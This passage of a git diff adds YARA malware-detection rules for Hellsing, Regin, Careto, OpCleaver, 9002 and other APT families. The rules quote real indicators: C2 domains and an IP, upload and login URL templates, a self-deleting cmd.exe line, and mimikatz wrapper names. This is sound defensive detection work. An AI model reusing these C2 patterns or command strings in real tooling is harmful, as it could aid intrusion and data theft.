+ $str3 = "Dollar General.doc\"" wide ascii
+ $str4 = "Dow Corning Corp.pdf\"" wide ascii
+ condition:
+ 1 of them and APT1_RARSilent_EXE_PDF
+}
+
+
diff --git a/malware/APT3102.yar b/malware/APT3102.yar
new file mode 100644
index 0000000..b2078e0
--- /dev/null
+++ b/malware/APT3102.yar
@@ -0,0 +1,36 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT3102Code : APT3102 Family
+{
+ meta:
+ description = "3102 code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 }
+
+ condition:
+ any of them
+}
+
+rule APT3102Strings : APT3102 Family
+{
+ meta:
+ description = "3102 Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ $ = "rundll32_exec.dll\x00Update"
+ // this is in the encrypted code - shares with 9002 variant
+ //$ = "POST http://%ls:%d/%x HTTP/1.1"
+
+ condition:
+ any of them
+}
diff --git a/malware/APT9002.yar b/malware/APT9002.yar
new file mode 100644
index 0000000..c24c4fc
--- /dev/null
+++ b/malware/APT9002.yar
@@ -0,0 +1,56 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT9002Code : APT9002 Family
+{
+ meta:
+ description = "9002 code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ // start code block
+ $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 }
+ // decryption from other variant with multiple start threads
+ $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC }
+
+ condition:
+ any of them
+}
+
+rule APT9002Strings : APT9002 Family
+{
+ meta:
+ description = "9002 Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ $ = "POST http://%ls:%d/%x HTTP/1.1"
+ $ = "%%TEMP%%\\%s_p.ax" wide ascii
+ $ = "%TEMP%\\uid.ax" wide ascii
+ $ = "%%TEMP%%\\%s.ax" wide ascii
+ // also triggers on surtr $ = "mydll.dll\x00DoWork"
+ $ = "sysinfo\x00sysbin01"
+ $ = "\\FlashUpdate.exe"
+
+ condition:
+ any of them
+}
+
+rule APT9002 : Family
+{
+ meta:
+ description = "9002"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ condition:
+ APT9002Code or APT9002Strings
+}
+
+
diff --git a/malware/APT_Careto.yar b/malware/APT_Careto.yar
new file mode 100644
index 0000000..794a5d3
--- /dev/null
+++ b/malware/APT_Careto.yar
@@ -0,0 +1,59 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Careto_SGH {
+ meta:
+ author = "AlienVault (Alberto Ortega)"
+ description = "TheMask / Careto SGH component signature"
+ reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+ strings:
+ $m1 = "PGPsdkDriver" ascii wide fullword
+ $m2 = "jpeg1x32" ascii wide fullword
+ $m3 = "SkypeIE6Plugin" ascii wide fullword
+ $m4 = "CDllUninstall" ascii wide fullword
+ condition:
+ 2 of them
+}
+
+rule Careto_OSX_SBD {
+ meta:
+ author = "AlienVault (Alberto Ortega)"
+ description = "TheMask / Careto OSX component signature"
+ reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+ strings:
+ /* XORed "/dev/null strdup() setuid(geteuid())" */
+ $1 = {FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12}
+ condition:
+ all of them
+}
+
+rule Careto_CnC {
+ meta:
+ author = "AlienVault (Alberto Ortega)"
+ description = "TheMask / Careto CnC communication signature"
+ reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+ strings:
+ $1 = "cgi-bin/commcgi.cgi" ascii wide
+ $2 = "Group" ascii wide
+ $3 = "Install" ascii wide
+ $4 = "Bn" ascii wide
+ condition:
+ all of them
+}
+
+rule Careto_CnC_domains {
+ meta:
+ author = "AlienVault (Alberto Ortega)"
+ description = "TheMask / Careto known command and control domains"
+ reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+ strings:
+ $1 = "linkconf.net" ascii wide nocase
+ $2 = "redirserver.net" ascii wide nocase
+ $3 = "swupdt.com" ascii wide nocase
+ condition:
+ any of them
+}
diff --git a/malware/APT_DeputyDog_Fexel.yar b/malware/APT_DeputyDog_Fexel.yar
new file mode 100644
index 0000000..3b1879d
--- /dev/null
+++ b/malware/APT_DeputyDog_Fexel.yar
@@ -0,0 +1,20 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_DeputyDog_Fexel
+{
+meta:
+ author = "ThreatConnect Intelligence Research Team"
+strings:
+ $180 = "180.150.228.102" wide ascii
+ $0808cmd = {25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21}
+ $cUp = "Upload failed! [Remote error code:" nocase wide ascii
+ $DGGYDSYRL = {00 44 47 47 59 44 53 59 52 4C 00}
+ $GDGSYDLYR = "GDGSYDLYR_%" wide ascii
+condition:
+ any of them
+}
diff --git a/malware/APT_Hellsing.yar b/malware/APT_Hellsing.yar
new file mode 100644
index 0000000..9a182b9
--- /dev/null
+++ b/malware/APT_Hellsing.yar
@@ -0,0 +1,159 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule apt_hellsing_implantstrings : PE
+{
+ meta:
+ Author = "Costin Raiu, Kaspersky Lab"
+ Date = "2015-04-07"
+ Description = "detection for Hellsing implants"
+ Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+ strings:
+ $mz="MZ"
+
+ $a1="the file uploaded failed !"
+ $a2="ping 127.0.0.1"
+
+ $b1="the file downloaded failed !"
+ $b2="common.asp"
+
+ $c="xweber_server.exe"
+ $d="action="
+
+ $debugpath1="d:\\Hellsing\\release\\msger\\" nocase
+ $debugpath2="d:\\hellsing\\sys\\xrat\\" nocase
+ $debugpath3="D:\\Hellsing\\release\\exe\\" nocase
+ $debugpath4="d:\\hellsing\\sys\\xkat\\" nocase
+ $debugpath5="e:\\Hellsing\\release\\clare" nocase
+ $debugpath6="e:\\Hellsing\\release\\irene\\" nocase
+ $debugpath7="d:\\hellsing\\sys\\irene\\" nocase
+
+ $e="msger_server.dll"
+ $f="ServiceMain"
+
+ condition:
+ ($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000
+}
+
+rule apt_hellsing_installer : PE
+{
+ meta:
+ Author = "Costin Raiu, Kaspersky Lab"
+ Date = "2015-04-07"
+ Description = "detection for Hellsing xweber/msger installers"
+ Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+ strings:
+ $mz="MZ"
+
+ $cmd="cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
+
+ $a1="xweber_install_uac.exe"
+ $a2="system32\\cmd.exe" wide
+ $a4="S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y="
+ $a5="S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
+ $a7="vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw=="
+ $a8="vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI" $a9="C:\\Windows\\System32\\sysprep\\sysprep.exe" wide
+ $a10="%SystemRoot%\\system32\\cmd.exe" wide
+ $a11="msger_install.dll"
+ $a12={00 65 78 2E 64 6C 6C 00}
+
+ condition:
+ ($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000
+}
+
+rule apt_hellsing_proxytool : PE
+{
+ meta:
+ Author = "Costin Raiu, Kaspersky Lab"
+ Date = "2015-04-07"
+ Description = "detection for Hellsing proxy testing tool"
+ Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+ strings:
+ $mz="MZ"
+ $a1="PROXY_INFO: automatic proxy url => %s "
+ $a2="PROXY_INFO: connection type => %d "
+ $a3="PROXY_INFO: proxy server => %s "
+ $a4="PROXY_INFO: bypass list => %s "
+ $a5="InternetQueryOption failed with GetLastError() %d"
+ $a6="D:\\Hellsing\\release\\exe\\exe\\" nocase
+
+ condition:
+ ($mz at 0) and (2 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_xkat : PE
+{
+ meta:
+ Author = "Costin Raiu, Kaspersky Lab"
+ Date = "2015-04-07"
+ Description = "detection for Hellsing xKat tool"
+ Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+ strings:
+ $mz="MZ"
+ $a1="\\Dbgv.sys"
+ $a2="XKAT_BIN"
+ $a3="release sys file error."
+ $a4="driver_load error. "
+ $a5="driver_create error."
+ $a6="delete file:%s error."
+ $a7="delete file:%s ok."
+ $a8="kill pid:%d error."
+ $a9="kill pid:%d ok."
+ $a10="-pid-delete"
+ $a11="kill and delete pid:%d error."
+ $a12="kill and delete pid:%d ok."
+
+ condition:
+ ($mz at 0) and (6 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_msgertype2 : PE
+{
+ meta:
+ Author = "Costin Raiu, Kaspersky Lab"
+ Date = "2015-04-07"
+ Description = "detection for Hellsing msger type 2 implants"
+ Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+ strings:
+ $mz="MZ"
+ $a1="%s\\system\\%d.txt"
+ $a2="_msger"
+ $a3="http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
+ $a4="http://%s/data/%s.1000001000"
+ $a5="/lib/common.asp?action=user_upload&file="
+ $a6="%02X-%02X-%02X-%02X-%02X-%02X"
+
+ condition:
+ ($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
+
+rule apt_hellsing_irene : PE
+{
+ meta:
+ Author = "Costin Raiu, Kaspersky Lab"
+ Date = "2015-04-07"
+ Description = "detection for Hellsing msger irene installer"
+ Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+ strings:
+ $mz="MZ"
+ $a1="\\Drivers\\usbmgr.tmp" wide
+ $a2="\\Drivers\\usbmgr.sys" wide
+ $a3="common_loadDriver CreateFile error! "
+ $a4="common_loadDriver StartService error && GetLastError():%d! "
+ $a5="irene" wide
+ $a6="aPLib v0.43 - the smaller the better"
+
+ condition:
+ ($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
diff --git a/malware/APT_Hikit.yar b/malware/APT_Hikit.yar
new file mode 100644
index 0000000..a57b492
--- /dev/null
+++ b/malware/APT_Hikit.yar
@@ -0,0 +1,16 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_Hikit_msrv
+{
+meta:
+ author = "ThreatConnect Intelligence Research Team"
+strings:
+ $m = {6D 73 72 76 2E 64 6C 6C 00 44 6C 6C}
+condition:
+ any of them
+}
diff --git a/malware/APT_Kaba.yar b/malware/APT_Kaba.yar
new file mode 100644
index 0000000..78249b3
--- /dev/null
+++ b/malware/APT_Kaba.yar
@@ -0,0 +1,26 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule rtf_Kaba_jDoe
+{
+meta:
+ author = "@patrickrolsen"
+ maltype = "APT.Kaba"
+ filetype = "RTF"
+ version = "0.1"
+ description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"
+ date = "2013-12-10"
+strings:
+ $magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+ $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+ $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+ $author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"
+ $author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"
+ $string1 = { 44 30 [16] 43 46 [23] 31 31 45 }
+condition:
+ ($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1
+}
diff --git a/malware/APT_Mongall.yar b/malware/APT_Mongall.yar
new file mode 100644
index 0000000..953abc3
--- /dev/null
+++ b/malware/APT_Mongall.yar
@@ -0,0 +1,68 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Backdoor_APT_Mongal
+{
+meta:
+ author = "@patrickrolsen"
+ maltype = "Backdoor.APT.Mongall"
+ version = "0.1"
+ reference = "fd69a799e21ccb308531ce6056944842"
+ date = "01/04/2014"
+strings:
+ $author = "author user"
+ $title = "title Vjkygdjdtyuj" nocase
+ $comp = "company ooo"
+ $cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10"
+ $passwd = "password 00000000"
+condition:
+ all of them
+}
+
+rule MongalCode : Mongal Family
+{
+ meta:
+ description = "Mongal code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-15"
+
+ strings:
+ // gettickcount value checking
+ $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB }
+
+ condition:
+ any of them
+}
+
+rule MongalStrings : Mongal Family
+{
+ meta:
+ description = "Mongal Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-15"
+
+ strings:
+ $ = "NSCortr.dll"
+ $ = "NSCortr1.dll"
+ $ = "Sina.exe"
+
+ condition:
+ any of them
+}
+
+rule Mongal : Family
+{
+ meta:
+ description = "Mongal"
+ author = "Seth Hardy"
+ last_modified = "2014-07-15"
+
+ condition:
+ MongalCode or MongalStrings
+}
+
+
diff --git a/malware/APT_NGO_wuaclt.yar b/malware/APT_NGO_wuaclt.yar
new file mode 100644
index 0000000..44209e1
--- /dev/null
+++ b/malware/APT_NGO_wuaclt.yar
@@ -0,0 +1,39 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_NGO_wuaclt
+{
+ meta:
+ author = "AlienVault Labs"
+ strings:
+ $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat"
+ $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+ $c = "/news/show.asp?id%d=%d"
+
+ $d = "%%APPDATA%%\\Microsoft\\wuauclt\\"
+ $e = "0l23kj@nboxu"
+
+ $f = "%%s.asp?id=%%d&Sid=%%d"
+ $g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)"
+ $h = "Cookies: UseID=KGIOODAOOK%%s"
+
+ condition:
+ ($a and $b and $c) or ($d and $e) or ($f and $g and $h)
+}
+
+rule APT_NGO_wuaclt_PDF
+{
+ meta:
+ author = "AlienVault Labs"
+
+ strings:
+ $pdf = "%PDF" nocase
+ $comment = {3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A}
+
+ condition:
+ $pdf at 0 and $comment in (0..200)
+}
diff --git a/malware/APT_OPCleaver.yar b/malware/APT_OPCleaver.yar
new file mode 100644
index 0000000..5465a11
--- /dev/null
+++ b/malware/APT_OPCleaver.yar
@@ -0,0 +1,279 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ZhoupinExploitCrew
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "zhoupin exploit crew" nocase
+ $s2 = "zhopin exploit crew" nocase
+ condition:
+ 1 of them
+}
+
+rule BackDoorLogger
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "BackDoorLogger"
+ $s2 = "zhuAddress"
+ condition:
+ all of them
+}
+
+rule Jasus
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "pcap_dump_open"
+ $s2 = "Resolving IPs to poison..."
+ $s3 = "WARNNING: Gateway IP can not be found"
+ condition:
+ all of them
+}
+
+rule LoggerModule
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "%s-%02d%02d%02d%02d%02d.r"
+ $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+ condition:
+ all of them
+}
+
+rule NetC
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "NetC.exe" wide
+ $s2 = "Net Service"
+ condition:
+ all of them
+}
+
+rule ShellCreator2
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "ShellCreator2.Properties"
+ $s2 = "set_IV"
+ condition:
+ all of them
+}
+
+rule SmartCopy2
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "SmartCopy2.Properties"
+ $s2 = "ZhuFrameWork"
+ condition:
+ all of them
+}
+
+rule SynFlooder
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+ $s2 = "your target's IP is : %s"
+ $s3 = "Raw TCP Socket Created successfully."
+ condition:
+ all of them
+}
+
+rule TinyZBot
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "NetScp" wide
+ $s2 = "TinyZBot.Properties.Resources.resources"
+
+ $s3 = "Aoao WaterMark"
+ $s4 = "Run_a_exe"
+ $s5 = "netscp.exe"
+
+ $s6 = "get_MainModule_WebReference_DefaultWS"
+ $s7 = "remove_CheckFileMD5Completed"
+ $s8 = "http://tempuri.org/"
+
+ $s9 = "Zhoupin_Cleaver"
+ condition:
+ ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9)
+}
+
+rule antivirusdetector
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "getShadyProcess"
+ $s2 = "getSystemAntiviruses"
+ $s3 = "AntiVirusDetector"
+ condition:
+ all of them
+}
+
+rule csext
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "COM+ System Extentions"
+ $s2 = "csext.exe"
+ $s3 = "COM_Extentions_bin"
+ condition:
+ all of them
+}
+
+rule kagent
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "kill command is in last machine, going back"
+ $s2 = "message data length in B64: %d Bytes"
+ condition:
+ all of them
+}
+
+rule mimikatzWrapper
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "mimikatzWrapper"
+ $s2 = "get_mimikatz"
+ condition:
+ all of them
+}
+
+rule pvz_in
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "LAST_TIME=00/00/0000:00:00PM$"
+ $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+ condition:
+ all of them
+}
+
+rule pvz_out
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "Network Connectivity Module" wide
+ $s2 = "OSPPSVC" wide
+ condition:
+ all of them
+}
+
+rule wndTest
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "[Alt]" wide
+ $s2 = "<< %s >>:" wide
+ $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+ condition:
+ all of them
+}
+
+rule zhCat
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "zhCat -l -h -tp 1234"
+ $s2 = "ABC ( A Big Company )" wide
+ condition:
+ all of them
+}
+
+rule zhLookUp
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "zhLookUp.Properties"
+ condition:
+ all of them
+}
+
+rule zhmimikatz
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "MimikatzRunner"
+ $s2 = "zhmimikatz"
+ condition:
+ all of them
+}
+
+rule Zh0uSh311
+{
+ meta:
+ author = "Cylance"
+ date = "2014-12-02"
+ description = "http://cylance.com/opcleaver"
+ strings:
+ $s1 = "Zh0uSh311"
+ condition:
+ all of them
+}
diff --git a/malware/APT_Regin.yar b/malware/APT_Regin.yar
new file mode 100644
index 0000000..1e9d14a
--- /dev/null
+++ b/malware/APT_Regin.yar
@@ -0,0 +1,407 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+rule Regin_APT_KernelDriver_Generic_A {
+ meta:
+ description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+ author = "@Malwrsignatures - included in APT Scanner THOR"
+ date = "23.11.14"
+ hash1 = "187044596bc1328efa0ed636d8aa4a5c"
+ hash2 = "06665b96e293b23acc80451abb413e50"
+ hash3 = "d240f06e98c8d3e647cbf4d442d79475"
+ strings:
+ $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+ $m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+
+ $s0 = "atapi.sys" fullword wide
+ $s1 = "disk.sys" fullword wide
+ $s3 = "h.data" fullword ascii
+ $s4 = "\\system32" fullword ascii
+ $s5 = "\\SystemRoot" fullword ascii
+ $s6 = "system" fullword ascii
+ $s7 = "temp" fullword ascii
+ $s8 = "windows" fullword ascii
+
+ $x1 = "LRich6" fullword ascii
+ $x2 = "KeServiceDescriptorTable" fullword ascii
+ condition:
+ $m0 at 0 and $m1 and
+ all of ($s*) and 1 of ($x*)
+}
+
+rule Regin_APT_KernelDriver_Generic_B {
+ meta:
+ description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+ author = "@Malwrsignatures - included in APT Scanner THOR"
+ date = "23.11.14"
+ hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
+ hash2 = "bfbe8c3ee78750c3a520480700e440f8"
+ hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
+ hash4 = "06665b96e293b23acc80451abb413e50"
+ hash5 = "2c8b9d2885543d7ade3cae98225e263b"
+ hash6 = "4b6b86c7fec1c574706cecedf44abded"
+ hash7 = "187044596bc1328efa0ed636d8aa4a5c"
+ hash8 = "d240f06e98c8d3e647cbf4d442d79475"
+ hash9 = "6662c390b2bbbd291ec7987388fc75d7"
+ hash10 = "1c024e599ac055312a4ab75b3950040a"
+ hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
+ hash12 = "b505d65721bb2453d5039a389113b566"
+ hash13 = "b269894f434657db2b15949641a67532"
+ strings:
+ $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+ $s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+ $s2 = "H.data" fullword ascii nocase
+ $s3 = "INIT" fullword ascii
+ $s4 = "ntoskrnl.exe" fullword ascii
+
+ $v1 = "\\system32" fullword ascii
+ $v2 = "\\SystemRoot" fullword ascii
+ $v3 = "KeServiceDescriptorTable" fullword ascii
+
+ $w1 = "\\system32" fullword ascii
+ $w2 = "\\SystemRoot" fullword ascii
+ $w3 = "LRich6" fullword ascii
+
+ $x1 = "_snprintf" fullword ascii
+ $x2 = "_except_handler3" fullword ascii
+
+ $y1 = "mbstowcs" fullword ascii
+ $y2 = "wcstombs" fullword ascii
+ $y3 = "KeGetCurrentIrql" fullword ascii
+
+ $z1 = "wcscpy" fullword ascii
+ $z2 = "ZwCreateFile" fullword ascii
+ $z3 = "ZwQueryInformationFile" fullword ascii
+ $z4 = "wcslen" fullword ascii
+ $z5 = "atoi" fullword ascii
+ condition:
+ $m0 at 0 and all of ($s*) and
+ ( all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*) )
+ and filesize < 20KB
+}
+
+rule Regin_APT_KernelDriver_Generic_C {
+ meta:
+ description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+ author = "@Malwrsignatures - included in APT Scanner THOR"
+ date = "23.11.14"
+ hash1 = "e0895336617e0b45b312383814ec6783556d7635"
+ hash2 = "732298fa025ed48179a3a2555b45be96f7079712"
+ strings:
+ $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+
+ $s0 = "KeGetCurrentIrql" fullword ascii
+ $s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
+ $s2 = "usbclass" fullword wide
+
+ $x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
+ $x2 = "Universal Serial Bus Class Driver" fullword wide
+ $x3 = "5.2.3790.0" fullword wide
+
+ $y1 = "LSA Shell" fullword wide
+ $y2 = "0Richw" fullword ascii
+ condition:
+ $m0 at 0 and all of ($s*) and
+ ( all of ($x*) or all of ($y*) )
+ and filesize < 20KB
+}
+
+/* Update 27.11.14 */
+
+rule Regin_sig_svcsstat {
+ meta:
+ description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
+ author = "@MalwrSignatures"
+ date = "26.11.14"
+ hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
+ strings:
+ $s0 = "Service Control Manager" fullword ascii
+ $s1 = "_vsnwprintf" fullword ascii
+ $s2 = "Root Agency" fullword ascii
+ $s3 = "Root Agency0" fullword ascii
+ $s4 = "StartServiceCtrlDispatcherA" fullword ascii
+ $s5 = "\\\\?\\UNC" fullword wide
+ $s6 = "%ls%ls" fullword wide
+ condition:
+ all of them and filesize < 15KB and filesize > 10KB
+}
+
+rule Regin_Sample_1 {
+ meta:
+ description = "Auto-generated rule - file-3665415_sys"
+ author = "@MalwrSignatures"
+ date = "26.11.14"
+ hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
+ strings:
+ $s0 = "Getting PortName/Identifier failed - %x" fullword ascii
+ $s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
+ $s2 = "External Naming Failed - Status %x" fullword ascii
+ $s3 = "------- Same multiport - different interrupts" fullword ascii
+ $s4 = "%x occurred prior to the wait - starting the" fullword ascii
+ $s5 = "'user registry info - userPortIndex: %d" fullword ascii
+ $s6 = "Could not report legacy device - %x" fullword ascii
+ $s7 = "entering SerialGetPortInfo" fullword ascii
